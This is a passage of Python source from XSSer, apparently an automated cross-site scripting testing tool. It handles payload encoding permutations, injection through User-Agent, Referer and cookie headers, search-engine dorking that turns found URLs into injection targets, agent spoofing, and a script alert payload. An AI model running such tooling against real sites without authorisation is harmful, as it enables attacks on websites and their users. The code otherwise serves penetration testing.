  1568.             self.report("\n[!] Hashing: \n")
    1569. 

  1569.             for key, value in self.hashed_injections.items():
    1570. 

  1570.                 if str(key) in str(dest_url): # GET
    1571. 

  1571.                     if key not in current_hashes:
    1572. 

  1572.                         self.report(" [ " +key+" ] : [" , value + " ]")
    1573. 

  1573.                         self.final_hashes[key] = value
    1574. 

  1574.                         current_hashes.append(key)
    1575. 

  1575.                 else:
    1576. 

  1576.                     if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
    1577. 

  1577.                         b64_string = payload["payload"].split("[B64]")
    1578. 

  1578.                         b64_string = b64_string[1]
    1579. 

  1579.                         b64_string = b64_string.replace('PAYLOAD', key)
    1580. 

  1580.                         b64_string = b64encode(b64_string)
    1581. 

  1581.                         b64_string = urllib.parse.urlencode({'':b64_string})
    1582. 

  1582.                         if b64_string.startswith("="):
    1583. 

  1583.                             b64_string = b64_string.replace("=", "")
    1584. 

  1584.                         if str(b64_string) in str(dest_url):
    1585. 

  1585.                             if key not in current_hashes:
    1586. 

  1586.                                 self.report(" [ " +key+" ] : [" , value + " ]")
    1587. 

  1587.                                 self.final_hashes[key] = value
    1588. 

  1588.                                 current_hashes.append(key)
    1589. 

  1589.                     else: # when using encoders (Str, Hex, Dec...)
    1590. 

  1590.                         payload_string = payload["payload"].replace("PAYLOAD", key)
    1591. 

  1591.                         hashed_payload = self.encoding_permutations(payload_string)
    1592. 

  1592.                         if self.options.Cem:
    1593. 

  1593.                             enc_perm = options.Cem.split(",")
    1594. 

  1594.                             for e in enc_perm:
    1595. 

  1595.                                 hashed_payload = self.encoding_permutations(payload_string)
    1596. 

  1596.                                 if e == "Str":
    1597. 

  1597.                                     hashed_payload = hashed_payload.replace(",", "%2C")
    1598. 

  1598.                                 if e == "Mix":
    1599. 

  1599.                                     hashed_payload=urllib.parse.quote(hashed_payload)
    1600. 

  1600.                                 if e == "Dec":
    1601. 

  1601.                                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1602. 

  1602.                                 if e == "Hex":
    1603. 

  1603.                                     hashed_payload = hashed_payload.replace("%", "%25")
    1604. 

  1604.                                 if e == "Hes":
    1605. 

  1605.                                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1606. 

  1606.                                     hashed_payload = hashed_payload.replace(";", "%3B")
    1607. 

  1607.                         else:
    1608. 

  1608.                             if self.options.Str:
    1609. 

  1609.                                 hashed_payload = hashed_payload.replace(",", "%2C")
    1610. 

  1610.                             if self.options.Mix:
    1611. 

  1611.                                 hashed_payload=urllib.parse.quote(hashed_payload)
    1612. 

  1612.                             if self.options.Dec:
    1613. 

  1613.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1614. 

  1614.                             if self.options.Hex:
    1615. 

  1615.                                 hashed_payload = hashed_payload.replace("%", "%25")
    1616. 

  1616.                             if self.options.Hes:
    1617. 

  1617.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1618. 

  1618.                                 hashed_payload = hashed_payload.replace(";", "%3B")
    1619. 

  1619.                         if str(hashed_payload) in str(dest_url): 
    1620. 

  1620.                             if key not in current_hashes:
    1621. 

  1621.                                 self.report(" [ " +key+" ] : [" , value + " ]")
    1622. 

  1622.                                 self.final_hashes[key] = value
    1623. 

  1623.                                 current_hashes.append(key)
    1624. 

  1624.             if self.extra_hashed_injections:
    1625. 

  1625.                 for k, v in self.extra_hashed_injections.items():
    1626. 

  1626.                     payload_url = str(v[1])
    1627. 

  1627.                     if payload_url == payload["payload"]:
    1628. 

  1628.                         if k not in current_hashes:
    1629. 

  1629.                             self.report(" [ " +k+" ] : [" , v[0] + " ]")
    1630. 

  1630.                             self.final_hashes[k] = v[0]
    1631. 

  1631.                             current_hashes.append(k)
    1632. 

  1632.             self.report("\n"+"-"*45+"\n")
    1633. 

  1633.         if payload['browser'] == "[Heuristic test]":
    1634. 

  1634.             self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
    1635. 

  1635.         else:
    1636. 

  1636.             if self.extra_hashed_injections:
    1637. 

  1637.                 extra_attacks=[]
    1638. 

  1638.                 if options.xsa:
    1639. 

  1639.                     extra_attacks.append("XSA")
    1640. 

  1640.                 if options.xsr:
    1641. 

  1641.                     extra_attacks.append("XSR")
    1642. 

  1642.                 if options.coo:
    1643. 

  1643.                     extra_attacks.append("COO")
    1644. 

  1644.                 if extra_attacks:
    1645. 

  1645.                     extra_attacks = "+ "+ str(extra_attacks)
    1646. 

  1646.                 if options.postdata:
    1647. 

  1647.                     self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
    1648. 

  1648.                 else:
    1649. 

  1649.                     self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
    1650. 

  1650.             else:
    1651. 

  1651.                 if options.postdata:
    1652. 

  1652.                     self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
    1653. 

  1653.                 else:
    1654. 

  1654.                     self.report("[*] Trying: \n\n" + dest_url.strip()+"\n")
    1655. 

  1655.             if not self.options.hash and not self.options.script:
    1656. 

  1656.                 if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
    1657. 

  1657.                     pass
    1658. 

  1658.                 else:
    1659. 

  1659.                     self.report("-"*45)
    1660. 

  1660.         if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
    1661. 

  1661.             pass
    1662. 

  1662.         else:
    1663. 

  1663.             if not "XSS" in dest_url or not "X1S" in dest_url:
    1664. 

  1664.                 if self.options.xsa or self.options.xsr or self.options.coo:
    1665. 

  1665.                     pass
    1666. 

  1666.                 else:
    1667. 

  1667.                     self.report("-"*45)
    1668. 

  1668.                     self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
    1669. 

  1669.                     if not self.options.verbose:
    1670. 

  1670.                         self.report("-"*45 + "\n")
    1671. 

  1671.             else:
    1672. 

  1672.                 self.report("-"*45)
    1673. 

  1673.                 self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
    1674. 

  1674.                 if not self.options.verbose:
    1675. 

  1675.                     self.report("-"*45 + "\n")
    1676. 

  1676.     	# statistics injections counters
    1677. 

  1677.         if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
    1678. 

  1678.             self.check_positives = self.check_positives + 1
    1679. 

  1679.         elif payload['browser']=="[Data Control Protocol Injection]":
    1680. 

  1680.             self.dcp_injection = self.dcp_injection + 1
    1681. 

  1681.         elif payload['browser']=="[Document Object Model Injection]":
    1682. 

  1682.             self.dom_injection = self.dom_injection + 1
    1683. 

  1683.         elif payload['browser']=="[Induced Injection]":
    1684. 

  1684.             self.httpsr_injection = self.httpsr_injection + 1
    1685. 

  1685.         elif payload['browser']=="[manual_injection]":
    1686. 

  1686.             self.manual_injection = self.manual_injection + 1
    1687. 

  1687.         else:
    1688. 

  1688.             self.auto_injection = self.auto_injection +1
    1689. 

  1689.         if not self.hashed_injections:
    1690. 

  1690.             for k, v in self.extra_hashed_injections.items():
    1691. 

  1691.                 if k in current_hashes:
    1692. 

  1692.                     if v[0] == "XSA":
    1693. 

  1693.                         agent = v[1]
    1694. 

  1694.                         agent = agent.replace("PAYLOAD", k)
    1695. 

  1695.                         Curl.agent = agent
    1696. 

  1696.                     if v[0] == "XSR":
    1697. 

  1697.                         referer = v[1]
    1698. 

  1698.                         referer = referer.replace("PAYLOAD", k)
    1699. 

  1699.                         Curl.referer = referer
    1700. 

  1700.                     if v[0] == "COO":
    1701. 

  1701.                         cookie = v[1]
    1702. 

  1702.                         cookie = cookie.replace("PAYLOAD", k)
    1703. 

  1703.                         Curl.cookie = cookie
    1704. 

  1704.         else:
    1705. 

  1705.             for key, value in self.hashed_injections.items():
    1706. 

  1706.                 for k, v in self.extra_hashed_injections.items():
    1707. 

  1707.                     payload_url = v[1]
    1708. 

  1708.                     payload_url = payload_url.replace("PAYLOAD",key)
    1709. 

  1709.                     payload_url = payload_url.replace(" ", "+") # black magic!
    1710. 

  1710.                     final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
    1711. 

  1711.                     if payload_url in final_dest_url:
    1712. 

  1712.                         if v[0] == "XSA":
    1713. 

  1713.                             agent = v[1]
    1714. 

  1714.                             agent = agent.replace("PAYLOAD", k)
    1715. 

  1715.                             Curl.agent = agent
    1716. 

  1716.                         if v[0] == "XSR":
    1717. 

  1717.                             referer = v[1]
    1718. 

  1718.                             referer = referer.replace("PAYLOAD", k)
    1719. 

  1719.                             Curl.referer = referer
    1720. 

  1720.                         if v[0] == "COO":
    1721. 

  1721.                             cookie = v[1]
    1722. 

  1722.                             cookie = cookie.replace("PAYLOAD", k)
    1723. 

  1723.                             Curl.cookie = cookie
    1724. 

  1724.                     else:
    1725. 

  1725.                         if k in current_hashes:
    1726. 

  1726.                             if v[0] == "XSA":
    1727. 

  1727.                                 agent = v[1]
    1728. 

  1728.                                 agent = agent.replace("PAYLOAD", k)
    1729. 

  1729.                                 Curl.agent = agent
    1730. 

  1730.                             if v[0] == "XSR":
    1731. 

  1731.                                 referer = v[1]
    1732. 

  1732.                                 referer = referer.replace("PAYLOAD", k)
    1733. 

  1733.                                 Curl.referer = referer
    1734. 

  1734.                             if v[0] == "COO":
    1735. 

  1735.                                 cookie = v[1]
    1736. 

  1736.                                 cookie = cookie.replace("PAYLOAD", k)
    1737. 

  1737.                                 Curl.cookie = cookie
    1738. 

  1738.         if options.verbose:
    1739. 

  1739.             self.report("-"*45)
    1740. 

  1740.             self.report("\n[+] HTTP Headers Verbose:\n")
    1741. 

  1741.             self.report(" [Client Request]")
    1742. 

  1742.             Curl.print_options()
    1743. 

  1743.             self.report(" [Server Reply]\n")
    1744. 

  1744.             self.report(curl_handle.info())
    1745. 

  1745.         self.report("="*45)
    1746. 

  1746.         self.report("[*] Injection(s) Results:")
    1747. 

  1747.         self.report("="*45 + "\n")
    1748. 

  1748.         if payload['browser']=="[Heuristic test]":
    1749. 

  1749.             for key, value in self.final_hashes.items():
    1750. 

  1750.                 if str(key) in dest_url:
    1751. 

  1751.                     heuristic_string = key
    1752. 

  1752.                     heuristic_param = str(payload['payload']).strip('XSS')
    1753. 

  1753.                     if heuristic_param == "\\":
    1754. 

  1754.                         self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
    1755. 

  1755.                     elif heuristic_param == "/":
    1756. 

  1756.                         self.heuris_slash_notfound = self.heuris_slash_notfound + 1
    1757. 

  1757.                     elif heuristic_param == ">":
    1758. 

  1758.                         self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
    1759. 

  1759.                     elif heuristic_param == "<":
    1760. 

  1760.                         self.heuris_minor_notfound = self.heuris_minor_notfound + 1
    1761. 

  1761.                     elif heuristic_param == ";":
    1762. 

  1762.                          self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
    1763. 

  1763.                     elif heuristic_param == "'":
    1764. 

  1764.                          self.heuris_colon_notfound = self.heuris_colon_notfound + 1
    1765. 

  1765.                     elif heuristic_param == '"':
    1766. 

  1766.                          self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
    1767. 

  1767.                     elif heuristic_param == "=":
    1768. 

  1768.                          self.heuris_equal_notfound = self.heuris_equal_notfound + 1
    1769. 

  1769.                     self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
    1770. 

  1770.         elif self.options.hash:
    1771. 

  1771.             for key, value in self.final_hashes.items():
    1772. 

  1772.                 self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
    1773. 

  1773.             self.report("\n" +"="*45)
    1774. 

  1774.         else:
    1775. 

  1775.             for key, value in self.final_hashes.items():
    1776. 

  1776.                 if "XSA" in value:
    1777. 

  1777.                     method = "xsa"
    1778. 

  1778.                     hashing = key
    1779. 

  1779.                 elif "XSR" in value:
    1780. 

  1780.                     method = "xsr"
    1781. 

  1781.                     hashing = key
    1782. 

  1782.                 elif "COO" in value:
    1783. 

  1783.                     method = "coo"
    1784. 

  1784.                     hashing = key
    1785. 

  1785.                 else:
    1786. 

  1786.                     method = "url"
    1787. 

  1787.                     hashing = key
    1788. 

  1788.                 if self.options.Str:
    1789. 

  1789.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1790. 

  1790.                     hashed_payload = self.encoding_permutations(payload_string)
    1791. 

  1791.                     hashed_payload = hashed_payload.replace(",", "%2C")
    1792. 

  1792.                     if str(hashed_payload) in str(dest_url):
    1793. 

  1793.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1794. 

  1794.                 elif self.options.Mix:
    1795. 

  1795.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1796. 

  1796.                     hashed_payload = self.encoding_permutations(payload_string)
    1797. 

  1797.                     hashed_payload=urllib.parse.quote(hashed_payload)
    1798. 

  1798.                     if str(hashed_payload) in str(dest_url):
    1799. 

  1799.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1800. 

  1800.                 elif self.options.Dec:
    1801. 

  1801.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1802. 

  1802.                     hashed_payload = self.encoding_permutations(payload_string)
    1803. 

  1803.                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1804. 

  1804.                     if str(hashed_payload) in str(dest_url):
    1805. 

  1805.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1806. 

  1806.                 elif self.options.Hex:
    1807. 

  1807.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1808. 

  1808.                     hashed_payload = self.encoding_permutations(payload_string)
    1809. 

  1809.                     hashed_payload = hashed_payload.replace("%", "%25")
    1810. 

  1810.                     if str(hashed_payload) in str(dest_url):
    1811. 

  1811.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1812. 

  1812.                 elif self.options.Hes:
    1813. 

  1813.                     payload_string = payload["payload"].replace("PAYLOAD", key)
    1814. 

  1814.                     hashed_payload = self.encoding_permutations(payload_string)
    1815. 

  1815.                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1816. 

  1816.                     hashed_payload = hashed_payload.replace(";", "%3B")
    1817. 

  1817.                     if str(hashed_payload) in str(dest_url):
    1818. 

  1818.                         self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1819. 

  1819.                 else:
    1820. 

  1820.                     if self.options.Cem:
    1821. 

  1821.                         enc_perm = options.Cem.split(",")
    1822. 

  1822.                         payload_string = payload["payload"].replace("PAYLOAD", key)
    1823. 

  1823.                         for e in enc_perm:
    1824. 

  1824.                             hashed_payload = self.encoding_permutations(payload_string)
    1825. 

  1825.                             if str(e) == "Str":
    1826. 

  1826.                                 hashed_payload = hashed_payload.replace(",", "%2C")
    1827. 

  1827.                             if e == "Mix":
    1828. 

  1828.                                 hashed_payload=urllib.parse.quote(hashed_payload)
    1829. 

  1829.                             if e == "Dec":
    1830. 

  1830.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1831. 

  1831.                             if e == "Hex":
    1832. 

  1832.                                 hashed_payload = hashed_payload.replace("%", "%25")
    1833. 

  1833.                             if e == "Hes":
    1834. 

  1834.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1835. 

  1835.                                 hashed_payload = hashed_payload.replace(";", "%3B")
    1836. 

  1836.                         if str(hashed_payload) in str(dest_url):
    1837. 

  1837.                             self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1838. 

  1838.                     else:
    1839. 

  1839.                         if str(key) in str(dest_url):
    1840. 

  1840.                             self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
    1841. 

  1841.                         else:
    1842. 

  1842.                             if key in current_hashes:
    1843. 

  1843.                                 if method == "xsa":
    1844. 

  1844.                                     self.add_failure(dest_url, payload, key, query_string, orig_url, "XSA") # failed!
    1845. 

  1845.                                 elif method == "xsr":
    1846. 

  1846.                                     self.add_failure(dest_url, payload, key, query_string, orig_url, "XSR") # failed!
    1847. 

  1847.                                 elif method == "coo":
    1848. 

  1848.                                     self.add_failure(dest_url, payload, key, query_string, orig_url, "COO") # failed!
    1849. 

  1849.             self.report("\n" +"="*45)
    1850. 

  1850.         if str(curl_handle.info()["http-code"]) == "404":
    1851. 

  1851.             self.report("\n[Error] 404 Not Found: The server has not found anything matching the Request-URI\n")
    1852. 

  1852.         elif str(curl_handle.info()["http-code"]) == "403":
    1853. 

  1853.             self.report("\n[Error] 403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
    1854. 

  1854.         elif str(curl_handle.info()["http-code"]) == "400":
    1855. 

  1855.             self.report("\n[Error] 400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
    1856. 

  1856.         elif str(curl_handle.info()["http-code"]) == "401":
    1857. 

  1857.             self.report("\n[Error] 401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are typed correctly\n")
    1858. 

  1858.         elif str(curl_handle.info()["http-code"]) == "407":
    1859. 

  1859.             self.report("\n[Error] 407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
    1860. 

  1860.         elif str(curl_handle.info()["http-code"]) == "408":
    1861. 

  1861.             self.report("\n[Error] 408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
    1862. 

  1862.         elif str(curl_handle.info()["http-code"]) == "500":
    1863. 

  1863.             self.report("\n[Error] 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
    1864. 

  1864.         elif str(curl_handle.info()["http-code"]) == "501":
    1865. 

  1865.             self.report("\n[Error] 501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
    1866. 

  1866.         elif str(curl_handle.info()["http-code"]) == "502":
    1867. 

  1867.             self.report("\n[Error] 502 Bad Gateway: The server received an invalid response from the upstream server\n")
    1868. 

  1868.         elif str(curl_handle.info()["http-code"]) == "503":
    1869. 

  1869.             self.report("\n[Error] 503 Service Unavailable: The server is currently unable to handle the request [OFFLINE!]\n")
    1870. 

  1870.         elif str(curl_handle.info()["http-code"]) == "504":
    1871. 

  1871.             self.report("\n[Error] 504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
    1872. 

  1872.         elif str(curl_handle.info()["http-code"]) == "0":
    1873. 

  1873.             self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
    1874. 

  1874.         else:
    1875. 

  1875.             self.report("\n[Error] Not injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n")
    1876. 

  1876.         if str(curl_handle.info()["http-code"]) == "404":
    1877. 

  1877.             self.not_connection = self.not_connection + 1
    1878. 

  1878.         elif str(curl_handle.info()["http-code"]) == "503":
    1879. 

  1879.             self.forwarded_connection = self.forwarded_connection + 1
    1880. 

  1880.         else:
    1881. 

  1881.             self.other_connection = self.other_connection + 1
    1882. 

  1882. 

  1883.     def check_positive(self, curl_handle, dest_url, payload, query_string):
    1884. 

  1884.         """
    1885. 

  1885.         Perform extra check for positives
    1886. 

  1886.         """
    1887. 

  1887.         body = curl_handle.body()
    1888. 

  1888.         pass
    1889. 

  1889. 

  1890.     def create_options(self, args=None):
    1891. 

  1891.         """
    1892. 

  1892.         Create options for OptionParser.
    1893. 

  1893.         """
    1894. 

  1894.         self.optionParser = XSSerOptions()
    1895. 

  1895.         self.options = self.optionParser.get_options(args)
    1896. 

  1896.         if not self.options:
    1897. 

  1897.             return False
    1898. 

  1898.         return self.options
    1899. 

  1899. 

  1900.     def _get_attack_urls(self):
    1901. 

  1901.         """
    1902. 

  1902.         Process payload options and make up the payload list for the attack.
    1903. 

  1903.         """
    1904. 

  1904.         urls = []
    1905. 

  1905.         options = self.options
    1906. 

  1906.         p = self.optionParser
    1907. 

  1907.         if options.imx:
    1908. 

  1908.             self.create_fake_image(options.imx, options.script)
    1909. 

  1909.             return []
    1910. 

  1910.         if options.flash:
    1911. 

  1911.             self.create_fake_flash(options.flash, options.script)
    1912. 

  1912.             return []
    1913. 

  1913.         if options.update:
    1914. 

  1914.             self.report('='*75)
    1915. 

  1915.             self.report(str(p.version))
    1916. 

  1916.             self.report('='*75)
    1917. 

  1917.             try:
    1918. 

  1918.                 print("\nTrying to update to the latest stable version...\n")
    1919. 

  1919.                 Updater() 
    1920. 

  1920.             except:
    1921. 

  1921.                 print("\nSomething was wrong!. You should clone XSSer manually with:\n")
    1922. 

  1922.                 print("$ git clone https://code.03c8.net/epsylon/xsser\n")
    1923. 

  1923. 

  1924.                 print("\nAlso you can try this other mirror:\n")
    1925. 

  1925.                 print("$ git clone https://github.com/epsylon/xsser\n")
    1926. 

  1926.             return []
    1927. 

  1927.         if options.wizard: # processing wizard template
    1928. 

  1928.            if self.user_template is not None:
    1929. 

  1929.                self.options.statistics = True # detailed output
    1930. 

  1930.                if self.user_template[0] == "DORKING": # mass-dorking
    1931. 

  1931.                    self.options.dork_file = True
    1932. 

  1932.                    self.options.dork_mass = True
    1933. 

  1933.                elif "http" in self.user_template[0]: # from target url
    1934. 

  1934.                    self.options.url = self.user_template[0]
    1935. 

  1935.                else: # from file
    1936. 

  1936.                    self.options.readfile = self.user_template[0]
    1937. 

  1937.                if self.user_template[1] == "CRAWLER": # crawlering target
    1938. 

  1938.                    self.options.crawling = "10"
    1939. 

  1939.                else: # manual payload (GET or POST)
    1940. 

  1940.                    if self.user_template_conntype == "GET":
    1941. 

  1941.                        self.options.getdata = self.user_template[1]
    1942. 

  1942.                    else:
    1943. 

  1943.                        self.options.postdata = self.user_template[1]
    1944. 

  1944.                if self.user_template[2] == "Proxy: No - Spoofing: Yes":
    1945. 

  1945.                    self.options.ignoreproxy = True
    1946. 

  1946.                    self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
    1947. 

  1947.                    self.options.referer = "127.0.0.1" # spoof referer
    1948. 

  1948.                elif self.user_template[2] == "Proxy: No - Spoofing: No":
    1949. 

  1949.                    self.options.ignoreproxy = True
    1950. 

  1950.                else: # using proxy + spoofing
    1951. 

  1951.                    self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
    1952. 

  1952.                    self.options.referer = "127.0.0.1" # spoof referer
    1953. 

  1953.                    if self.user_template[2] is not None:
    1954. 

  1954.                        self.options.proxy = self.user_template[2]
    1955. 

  1955.                    else:
    1956. 

  1956.                        self.options.ignoreproxy = True
    1957. 

  1957.                if self.user_template[3] == "Not using encoders":
    1958. 

  1958.                    pass
    1959. 

  1959.                elif self.user_template[3] == "Hex": # Hexadecimal
    1960. 

  1960.                    self.options.Hex = True
    1961. 

  1961.                elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape()
    1962. 

  1962.                    self.options.Str = True
    1963. 

  1963.                    self.options.Une = True
    1964. 

  1964.                else: # Character encoding mutations
    1965. 

  1965.                    self.options.Cem = self.user_template[3]
    1966. 

  1966.                if self.user_template[4] == "Alertbox": # Classic AlertBox injection
    1967. 

  1967.                    self.options.finalpayload = "<script>alert('XSS');</script>"
    1968. 

  1968.                else:
    1969. 

  1969.                    if self.user_template[4] is not None: # Inject user script
    1970. 

  1970.                        self.options.finalpayload = self.user_template[4]
    1971. 

  1971.                    else: # not final injection
    1972. 

  1972.                        pass 
    1973. 

  1973.            else: # exit
    1974. 

  1974.                return
    1975. 

  1975.         if options.target: # miau!
    1976. 

  1976.             self.report('='*75)
    1977. 

  1977.             self.report(str(p.version))
    1978. 

  1978.             self.report('='*75)
    1979. 

  1979.             self.report("Testing [Full XSS audit]... ;-)")
    1980. 

  1980.             self.report('='*75)
    1981. 

  1981.             self.report("\n[Info] The following actions will be performed at the end:\n")
    1982. 

  1982.             self.report("  1- Output with detailed statistics\n")
    1983. 

  1983.             self.report("  2- Export results to files: \n\n     - a) XSSreport.raw \n     - b) XSSer_<target>_<datetime>.xml\n")
    1984. 

  1984.             self.options.crawling = "99999" # set max num of urls to crawl
    1985. 

  1985.             self.options.crawler_width = "5" # set max num of deeping levels
    1986. 

  1986.             self.options.statistics = True # detailed output
    1987. 

  1987.             self.options.timeout = "60" # timeout
    1988. 

  1988.             self.options.retries = "2" # retries  
    1989. 

  1989.             self.options.delay = "5" # delay
    1990. 

  1990.             self.options.threads = "10" # threads
    1991. 

  1991.             self.options.followred = True # follow redirs
    1992. 

  1992.             self.options.nohead = False # HEAD check
    1993. 

  1993.             self.options.reversecheck = True # try to establish a reverse connection 
    1994. 

  1994.             self.options.fuzz = True # autofuzzing 
    1995. 

  1995.             self.options.coo = True # COO
    1996. 

  1996.             self.options.xsa = True # XSA
    1997. 

  1997.             self.options.xsr = True # XSR
    1998. 

  1998.             self.options.dcp = True # DCP
    1999. 

  1999.             self.options.dom = True # DOM
    2000. 

  2000.             self.options.inducedcode = True # Induced
    2001. 

  2001.             self.options.fileoutput = True # Important: export results to file (.raw)
    2002. 

  2002.             self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml
    2003. 

  2003.             self.check_trace() # XST
    2004. 

  2004.             urls = [options.target]
    2005. 

  2005.         if options.url:
    2006. 

  2006.             self.report('='*75)
    2007. 

  2007.             self.report(str(p.version))
    2008. 

  2008.             self.report('='*75)
    2009. 

  2009.             if self.options.crawling:
    2010. 

  2010.                 self.report("Testing [XSS from CRAWLER]...")
    2011. 

  2011.             else:
    2012. 

  2012.                 self.report("Testing [XSS from URL]...")
    2013. 

  2013.             self.report('='*75)
    2014. 

  2014.             urls = [options.url]
    2015. 

  2015.         elif options.readfile:
    2016. 

  2016.             self.report('='*75)
    2017. 

  2017.             self.report(str(p.version))
    2018. 

  2018.             self.report('='*75)
    2019. 

  2019.             self.report("Testing [XSS from FILE]...")
    2020. 

  2020.             self.report('='*75)
    2021. 

  2021.             try:
    2022. 

  2022.                 f = open(options.readfile)
    2023. 

  2023.                 urls = f.readlines()
    2024. 

  2024.                 urls = [ line.replace('\n','') for line in urls ]
    2025. 

  2025.                 f.close()
    2026. 

  2026.             except:
    2027. 

  2027.                 import os.path
    2028. 

  2028.                 if os.path.exists(options.readfile) == True:
    2029. 

  2029.                     self.report('\nThere are some errors opening the file: ', options.readfile, "\n")
    2030. 

  2030.                 else:
    2031. 

  2031.                     self.report('\nCannot found file: ', options.readfile, "\n")
    2032. 

  2032.         elif options.dork: # dork a query
    2033. 

  2033.             self.report('='*75)
    2034. 

  2034.             self.report(str(p.version))
    2035. 

  2035.             self.report('='*75)
    2036. 

  2036.             self.report("Testing [XSS from DORK]... Good luck! ;-)")
    2037. 

  2037.             self.report('='*75)
    2038. 

  2038.             if options.dork_mass: # massive dorkering
    2039. 

  2039.                 for e in self.search_engines:
    2040. 

  2040.                     try:
    2041. 

  2041.                         dorker = Dorker(e)
    2042. 

  2042.                         urls = dorker.dork(options.dork)
    2043. 

  2043.                         i = 0
    2044. 

  2044.                         for u in urls: # replace original parameter for injection keyword (XSS)
    2045. 

  2045.                             p_uri = urlparse(u)
    2046. 

  2046.                             uri = p_uri.netloc
    2047. 

  2047.                             path = p_uri.path
    2048. 

  2048.                             target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
    2049. 

  2049.                             for key, value in target_params.items(): # parse params to apply keywords
    2050. 

  2050.                                 for v in value:
    2051. 

  2051.                                     target_params[key] = 'XSS'
    2052. 

  2052.                             target_url_params = urllib.parse.urlencode(target_params)
    2053. 

  2053.                             u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    2054. 

  2054.                             urls[i] = u
    2055. 

  2055.                             i = i + 1
    2056. 

  2056.                     except Exception as e:
    2057. 

  2057.                         for reporter in self._reporters:
    2058. 

  2058.                             reporter.mosquito_crashed(dorker.search_url, str(e.message))
    2059. 

  2059.                     else:
    2060. 

  2060.                         if urls is not None:
    2061. 

  2061.                            for url in urls:
    2062. 

  2062.                                 for reporter in self._reporters:
    2063. 

  2063.                                     reporter.add_link(dorker.search_url, url)
    2064. 

  2064.             else:
    2065. 

  2065.                 if not options.dork_engine:
    2066. 

  2066.                     options.dork_engine = 'duck' # default search engine [26-08/2019]
    2067. 

  2067.                 dorker = Dorker(options.dork_engine)
    2068. 

  2068.                 try:
    2069. 

  2069.                     urls = dorker.dork(options.dork)
    2070. 

  2070.                     i = 0
    2071. 

  2071.                     for u in urls: # replace original parameter for injection keyword (XSS)
    2072. 

  2072.                         p_uri = urlparse(u)
    2073. 

  2073.                         uri = p_uri.netloc
    2074. 

  2074.                         path = p_uri.path
    2075. 

  2075.                         target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
    2076. 

  2076.                         for key, value in target_params.items(): # parse params to apply keywords
    2077. 

  2077.                             for v in value:
    2078. 

  2078.                                 target_params[key] = 'XSS'
    2079. 

  2079.                         target_url_params = urllib.parse.urlencode(target_params)
    2080. 

  2080.                         u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    2081. 

  2081.                         urls[i] = u
    2082. 

  2082.                         i = i + 1
    2083. 

  2083.                 except Exception as e:
    2084. 

  2084.                     for reporter in self._reporters:
    2085. 

  2085.                         reporter.mosquito_crashed(dorker.search_url, str(e.message))
    2086. 

  2086.                 else:
    2087. 

  2087.                     if urls is not None:
    2088. 

  2088.                         for url in urls:
    2089. 

  2089.                             for reporter in self._reporters:
    2090. 

  2090.                                 reporter.add_link(dorker.search_url, url)
    2091. 

  2091. 

  2092.         elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt')
    2093. 

  2093.             self.report('='*75)
    2094. 

  2094.             self.report(str(p.version))
    2095. 

